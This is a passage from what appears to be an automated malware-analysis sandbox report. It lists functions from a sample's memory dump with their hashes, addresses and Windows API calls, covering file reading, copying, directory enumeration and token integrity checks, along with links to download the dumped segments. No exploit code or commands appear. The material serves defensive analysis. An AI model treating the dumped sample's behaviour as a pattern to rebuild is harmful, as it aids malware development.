Instruction ID: 711c0984ccafec52dae349cc7eb3a5016f1b27ba2e4b3442c46039a8db976738
Opcode Fuzzy Hash: 5b61e3a0ab0a311dd063e68fb352e10ce1940a46cc208bfbfe888656423414a9
Instruction Fuzzy Hash: CA11C674D0155AEAEB29EB64D852AFEBB36AF51300F1041A9D11663242EB304B05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001FDDD0, Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,001FE3C4,?), ref: 001FDE13

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ef08c26982edc1ea13f1cede80c0c1e7a6eb4ce096099456cbaf32be1f65b288
Instruction ID: 7a587a04bc971109b686208f2e9c6b406b7b8a447cb4f60639e47866e67f4d18
Opcode Fuzzy Hash: ef08c26982edc1ea13f1cede80c0c1e7a6eb4ce096099456cbaf32be1f65b288
Instruction Fuzzy Hash: 4A017171600708AFE7214E79A8C4B77FAD9FB65754F10453EF75A86251C7709C409660

Uniqueness

Uniqueness Score: -1.00%

Function 001CADBE, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 001CADCA

Part of subcall function 001FEFBC: FindNextFileW.KERNEL32(?,?,?,001CAA65,?,?,?,?,?,?,?,?,00000000), ref: 001FEFC5

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 001CADDC

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
String ID:
API String ID: 478157137-0
Opcode ID: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
Instruction ID: 9f06919c40586947b4adf21802bb15e253f4cc405a0cec8dc4a7b8d64ae1ede3
Opcode Fuzzy Hash: d6cc9e3f6a073cbabe237d4577feb8986a58e28b00b9da7d45366cacc3641812
Instruction Fuzzy Hash: 42E0863110414DBB9F025AA2CD05F7F7B69FFB1395791002CFE0686911E771ECA196D2

Uniqueness

Uniqueness Score: -1.00%

Function 001FEC21, Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,00000000,?,?,?,001FEF0B,?,001CB6A1,00000000,?,?,?,?,001CB6A1,?), ref: 001FEC31
GetLastError.KERNEL32(?,001FEF0B,?,001CB6A1,00000000,?), ref: 001FEC47

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CopyErrorFileLast
String ID:
API String ID: 374144340-0
Opcode ID: 942779a813684c95ccb1f8f19c9f4acc4612d3a147b461934335c68f3c3705bc
Instruction ID: fb3c0bfcb109b2a63fafca88e6295ea7b25e16da404471c4d313be73079da59c
Opcode Fuzzy Hash: 942779a813684c95ccb1f8f19c9f4acc4612d3a147b461934335c68f3c3705bc
Instruction Fuzzy Hash: 76E0863050818DFFDB159BA5DC08FAE7FE9AF55304F18C054F90485161D774D6519720

Uniqueness

Uniqueness Score: -1.00%

Function 001EB76D, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001EB772

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID:
API String ID: 3708980276-0
Opcode ID: 00ae565dccd98edf7095d5c9655f7bda3a4637be2746e99a3e4e0e89afdba4f7
Instruction ID: 637061cdbc1d7966554a01d0e8afa5b63c527b3f19a2003ec244138758775b25
Opcode Fuzzy Hash: 00ae565dccd98edf7095d5c9655f7bda3a4637be2746e99a3e4e0e89afdba4f7
Instruction Fuzzy Hash: 87817870C053AC9AEB01DFE8DA915EDFBB4BF6A304F50925EE49477252DB701A89CB10

Uniqueness

Uniqueness Score: -1.00%

Function 001D3B98, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D3B9D

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e4cf6e2889702d30a55a03068901f13f183ba0eb19b7c1ea2403207847f4ee66
Instruction ID: 5ae37f2313185050ca36546958d4994f9a43960a4d5c6ebe88494b241b181ddb
Opcode Fuzzy Hash: e4cf6e2889702d30a55a03068901f13f183ba0eb19b7c1ea2403207847f4ee66
Instruction Fuzzy Hash: 2B51AB34A156059FCB24CBA8C9C08ADBBB1BF48724B24425BE521AB391C731EA41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001DF1D7, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 001DEFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,001DF1EE,00000002,?,00000000,00000244,?,?,001DF321,?,00000000,00000244), ref: 001DF032

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000244,?,?,001DF321,?,00000000,00000244), ref: 001DF207

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 031c267bf7cdb5cec0f377b7738590e6c67d6d3349de2cb3110709bfb2bc38cb
Instruction ID: 2df89767ec7dab0db43679ba853db3be596ed39e414eb5d401dc706a1c6644d2
Opcode Fuzzy Hash: 031c267bf7cdb5cec0f377b7738590e6c67d6d3349de2cb3110709bfb2bc38cb
Instruction Fuzzy Hash: 6931D379E04205ABDF14CBA8D88466EBBA5AF41320F24427FE542E73C1DB70DF828B44

Uniqueness

Uniqueness Score: -1.00%

Function 001E35F2, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E35F7

Part of subcall function 001F8DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 001F8E0F
Part of subcall function 001F8DFD: OpenProcessToken.ADVAPI32(00000000), ref: 001F8E16
Part of subcall function 001F8DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 001F8E30
Part of subcall function 001F8DFD: GetLastError.KERNEL32 ref: 001F8E3A
Part of subcall function 001F8DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 001F8E4A
Part of subcall function 001F8DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 001F8E5E
Part of subcall function 001F8DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 001F8E72
Part of subcall function 001F8DFD: GlobalFree.KERNEL32 ref: 001F8E92

Part of subcall function 001E06DD: __EH_prolog.LIBCMT ref: 001E06E2

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Token$GlobalH_prologInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID:
API String ID: 2888657697-0
Opcode ID: 948f6a7356df9c73697a278451a2cf426e7abbe7daf66ca520ee5ea9efcd2ae9
Instruction ID: 1153ad9ad5902e56efec4e49a95d12fb4848cbc543abc8d05455de577b663ffa
Opcode Fuzzy Hash: 948f6a7356df9c73697a278451a2cf426e7abbe7daf66ca520ee5ea9efcd2ae9
Instruction Fuzzy Hash: 1B315771C05659EFCF08EFE5C491AEDFB75BF68304F10441AE52267242DB706A49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D3886, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D388B

Part of subcall function 001CAA9C: __EH_prolog.LIBCMT ref: 001CAAA1

Part of subcall function 001CABED: __EH_prolog.LIBCMT ref: 001CABF2

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 20943805902631749daaa0250bb02626954c799004d2430d52b4ffb44bdd8206
Instruction ID: ae816a2ca874ec9a4e76e7472f3f88d026608b96050d08fe874a1a2419e3ed60
Opcode Fuzzy Hash: 20943805902631749daaa0250bb02626954c799004d2430d52b4ffb44bdd8206
Instruction Fuzzy Hash: C221AF719053249FDB65DFA8C88479ABBF0FF18304F0044AED51AA7351C7719A04CB11

Uniqueness

Uniqueness Score: -1.00%

Function 001FE0F8, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,001FE75E,?,00004000), ref: 001FE163

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b20a4eb96e254a1ec52795e4978d9074c64b03cbba8cc56e294ad6c8f0641484
Instruction ID: 791949787e2b3186b172454d6631d48c302c6be6372d86208177cfb5e9b689f1
Opcode Fuzzy Hash: b20a4eb96e254a1ec52795e4978d9074c64b03cbba8cc56e294ad6c8f0641484
Instruction Fuzzy Hash: 5D118831600519FBDB05DF26CC04AAABBB9FF44760F108119F96897620DB30EE60DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 001D4D6C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 001C90F5

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: 50287631cdae92f0476d3fe81996cc9a2d671a625d1fd273d100ca6208d5171b
Instruction ID: 9e7674afffddb1d3f72926eebb866568cb35fe8a592f391112e4a7516456ac26
Opcode Fuzzy Hash: 50287631cdae92f0476d3fe81996cc9a2d671a625d1fd273d100ca6208d5171b
Instruction Fuzzy Hash: 3AF0F47251071C67CB24BBA4981AC9EBB9C9E10764B500169F91887293EB71DA3486D1

Uniqueness

Uniqueness Score: -1.00%

Function 001D37E4, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D37E9

Part of subcall function 001CAA9C: __EH_prolog.LIBCMT ref: 001CAAA1

Part of subcall function 001CABED: __EH_prolog.LIBCMT ref: 001CABF2

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0af8ccb2d8b82316416275b21e1c6f0f4127d728286a40a3d15c54ef8b9c9561
Instruction ID: 32ae1d7fc29a347599c003c04b7ecd885698b088edd50c483ad76374773f123a
Opcode Fuzzy Hash: 0af8ccb2d8b82316416275b21e1c6f0f4127d728286a40a3d15c54ef8b9c9561
Instruction Fuzzy Hash: 9611A375A05219AFDF15EFA8D885B9DBBB5EF18300F0040AEE519A7351C7309E04CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001DEFFF, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,001DF1EE,00000002,?,00000000,00000244,?,?,001DF321,?,00000000,00000244), ref: 001DF032

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ca317ea59d6b9ebb4865565f0592f29774bd142e9c1ba04153b78a441bca370a
Instruction ID: de85aff40cce68de0e1740cd9af68f4f98d0f93ca3a21ac3348119fa306b1613
Opcode Fuzzy Hash: ca317ea59d6b9ebb4865565f0592f29774bd142e9c1ba04153b78a441bca370a
Instruction Fuzzy Hash: 7301E870A04244ABEB388A149841B36379BEB55758F35847FF50BCB353D362DB83AA60

Uniqueness

Uniqueness Score: -1.00%

Function 001DF06A, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(000000FF,00000244,00000000,00000000,00000000,?,0000FFFF,00000244,?,001DF292,00000001,00000000,?,00000000,00000244), ref: 001DF090

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: fcba2205ed54797eeaa41c6e9f61e83634d30404ccf23d42738c22d4b30f858d
Instruction ID: 9791bcdac03d04ec1e3dd9dabc79bd19bc906bd3aeb0046a0afdd4ad9d83289b
Opcode Fuzzy Hash: fcba2205ed54797eeaa41c6e9f61e83634d30404ccf23d42738c22d4b30f858d
Instruction Fuzzy Hash: 63015E71600105BFE708CF59DC95AA6BBBAFB84344F14822AF40597651E371BE918BD0

Uniqueness

Uniqueness Score: -1.00%

Function 001E545D, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E5462

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d2d37992682e781a8c318c43eecfe578033b4f5dd35dde322fb7398b58dcaa70
Instruction ID: 3b334e0b7da7b4621024ff0427ec70a333d54568f6ba07be6d8a4c44d4954e05
Opcode Fuzzy Hash: d2d37992682e781a8c318c43eecfe578033b4f5dd35dde322fb7398b58dcaa70
Instruction Fuzzy Hash: C801C0B2D006589FC701EFA8C801AAEFBF9EF65310F10446FE455E3242EB705A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00205166, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6befc54d242bdbc7bfa54826ddf68d210c3aa543d9a7852ef2b4673ad2a24f6
Instruction ID: 5a9ea0934f7a7e43504674854d4f292a35dfebb0a78b7cf4cec440dd5719a32d
Opcode Fuzzy Hash: c6befc54d242bdbc7bfa54826ddf68d210c3aa543d9a7852ef2b4673ad2a24f6
Instruction Fuzzy Hash: E8F0F932531F2416D7322A299C09B9B72A89F95374F200715FC28825D3DF74E8728EA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E0568, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E056D

Part of subcall function 001DFCB2: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,001E05B0,?,?,00000244,00248780,00000000,00000001,?,001E08FF), ref: 001DFCD1
Part of subcall function 001DFCB2: _strlen.LIBCMT ref: 001DFCD8

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectoryH_prolog_strlen
String ID:
API String ID: 1906034785-0
Opcode ID: 9ed06d1499959ce32906b70da36dec8a00e67feb53832925b274579d09d6b631
Instruction ID: 7e9905e364d920cc212862a3c8a2b687161601f44343fbb74deab6a4f8145ecf
Opcode Fuzzy Hash: 9ed06d1499959ce32906b70da36dec8a00e67feb53832925b274579d09d6b631
Instruction Fuzzy Hash: D801A771611702AFD748AF799C857AAFAA8FF45320F10432EE029D72D2DB709911CF60

Uniqueness

Uniqueness Score: -1.00%

Function 001CAA9C, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001CAAA1

Part of subcall function 001CA9DC: __EH_prolog.LIBCMT ref: 001CA9E1
Part of subcall function 001CA9DC: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 001CAA4C

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$___std_fs_directory_iterator_open@12
String ID:
API String ID: 1512400408-0
Opcode ID: 54eaa2b707f76be27cd7fc54f5ad130aaa0c778b62255af3383bd98634392eeb
Instruction ID: 8ba8d9388d09d73dbd5267a65490f7cf7684f1d1a9c9a52ee28abbafe83315be
Opcode Fuzzy Hash: 54eaa2b707f76be27cd7fc54f5ad130aaa0c778b62255af3383bd98634392eeb
Instruction Fuzzy Hash: 65018071909719DFCB29DFA8D0916AEBBF4FF24314F10462EE49A93341C7709A08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001F58BF, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001F58C4

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID:
API String ID: 3708980276-0
Opcode ID: f6bb3b8599b748575a938984cd3cfc51d23f4f894adb64a83a4a6643fec4047f
Instruction ID: 91e2645c3c1e045edaa51b28a773a100a82ef688a121ea14d37ee887322e71c4
Opcode Fuzzy Hash: f6bb3b8599b748575a938984cd3cfc51d23f4f894adb64a83a4a6643fec4047f
Instruction Fuzzy Hash: D7F08672A001147BCB05AB98CC81DEEBB7CEF68320F04012AF422A3381DB705D04C660

Uniqueness

Uniqueness Score: -1.00%

Function 001D29C7, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D29CC

Part of subcall function 001D3DA4: __EH_prolog.LIBCMT ref: 001D3DA9
Part of subcall function 001D3DA4: std::_Lockit::_Lockit.LIBCPMT ref: 001D3DB7
Part of subcall function 001D3DA4: int.LIBCPMT ref: 001D3DCE
Part of subcall function 001D3DA4: std::_Lockit::~_Lockit.LIBCPMT ref: 001D3E1E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1350124489-0
